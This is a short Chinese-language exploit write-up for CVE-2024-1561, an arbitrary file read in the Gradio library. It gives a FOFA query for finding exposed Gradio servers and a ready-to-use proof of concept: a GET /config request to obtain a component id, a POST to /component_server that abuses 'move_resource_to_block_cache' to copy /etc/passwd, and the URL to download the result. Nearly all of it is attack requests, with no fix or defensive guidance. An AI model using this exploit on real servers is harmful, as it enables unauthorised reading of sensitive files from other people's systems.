Gradio存在任意文件读取漏洞(CVE-2024-1561)
Gradio是一个开源 Python 库,是通过友好的 Web 界面演示机器学习模型的方法。Gradio 存在安全漏洞,该漏洞源于端点不正确地允许调用类上的任何方法,允许未经授权的本地文件读取访问,可能导致敏感信息泄露。
fofa
body="gradio_mode"
poc
获取components后面的id值
GET /config HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xxx.xxx.xxx.xx
读取/etc/passwd
POST /component_server HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xxx.xxx.xxx.xxx
Content-Type: application/json
Content-Length: 105
{"component_id": "上面获取的id","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "a"}
读取该文件,实现任意文件读取
http://xxx.xxx.xxx.xxx/file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd
闽公网安备35020302035932号